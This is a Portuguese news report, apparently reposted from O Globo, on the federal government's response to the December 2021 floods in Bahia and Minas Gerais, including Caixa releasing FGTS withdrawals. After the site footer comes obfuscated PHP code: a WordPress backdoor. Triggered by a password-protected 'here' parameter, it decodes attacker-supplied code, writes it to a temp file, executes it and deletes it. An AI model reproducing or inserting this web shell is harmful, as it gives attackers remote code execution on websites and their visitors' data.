• SEJA BEM-VINDO

Bolsonaro diz que aguarda contato de governadores para enviar ajuda aos atingidos por temporais em MG e BA; Caixa vai liberar FGTS

Publicado em: 11/12/2021 Atualizado:: dezembro 11, 2021

 

Moradores de cidades de Minas Gerais e Bahia sofrem com fortes chuvas desde o início da semana

 

Após os estragos causados pelos temporais em parte da Bahia e Minas Gerais ao longo da semana, deixando mortos e desalojados, o presidente Jair Bolsonaro (PL) afirmou na manhã deste sábado que aguarda o contato dos governadores Rui Costa (PT-BA) e Romeu Zema (Novo-MG) para enviar apoio do governo federal para as áreas atingidas. O presidente da Caixa, Pedro Guimarães, presente na cerimônia de formatura de militares da Marinha, no Rio de Janeiro, disse que o banco deve liberar o FGTS para os atingidos pela catástrofe.

 

— O que precisa agora são as prefeituras indicarem os bairros, ou é toda a cidade, ou é parte. Ao fazer isso, nós pagamos em até cinco dias, utilizando agências, lotéricas, correspondentes ou aplicativo Caixa TEM — afirmou Pedro Guimarães.

 

O saque terá um limite de R$ 6.220,00. A liberação depende das prefeituras, ou o estado, decretar estado de calamidade pública. Nesta sexta-feira, o governo federal publicou uma edição extra do Diário Oficial da União onde reconhece, através do Ministério do Desenvolvimento Regional, a situação de emergência em 17 cidades da Bahia e em outras 32 de Minas Gerais.

O presidente Jair Bolsonaro disse que ainda não foi contactado pelos governadores da Bahia e de Minas Gerais. Segundo o chefe do Executivo, ele deve conversar com Romeu Zema nas próximas horas: “O Zema é parceiro, é aliado… Devo falar com ele daqui a pouco. O da Bahia… não teve nenhum contato ainda”.

 

— Tivemos há aproximadamente 48 horas uma catástrofe no sul da Bahia e norte de Minas. Em torno de 55 municípios foram atingidos, com enchentes, destruição de obras viárias. De imediato determinamos ao ministro Rogério Marinho e João Roma pra assumir a vanguarda do que pode ser feito pros nossos irmãos, bem como também o ministro Braga Netto. O Exército já faz um levantamento sobre o que aconteceu na área. Estamos prontos a colaborar. Precisamos ser provocados pelos respectivos governadores e prefeitos.

 

Após as fortes chuvas no Sul da Bahia terem atingido cerca de 30 cidades do estado e deixado dois municípios quase totalmente submersos, voluntários e moradores que se mobilizaram para ajudar vítimas da enchente reclamam da ineficiência do governo estadual no envio de equipamentos até os locais. Segundo eles, as aeronaves disponibilizadas estão paradas por falta de combustível. Até o momento, duas crianças e um adulto da mesma família morreram soterrados.

 

— Cada ministério tem o seu papel. O Ministério da Infraestrutura vai ver as pontes. As engenharias estão aptas a apoiar. Já têm helicópteros pré-selecionados, caso haja a necesiddade. E as tropas nas proximidades já estão preparando o reconhecimento daquilo que for solicitado — afirmou o ministro da Defesa, Walter Braga Netto.

 

 

Fonte: OGlobo

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}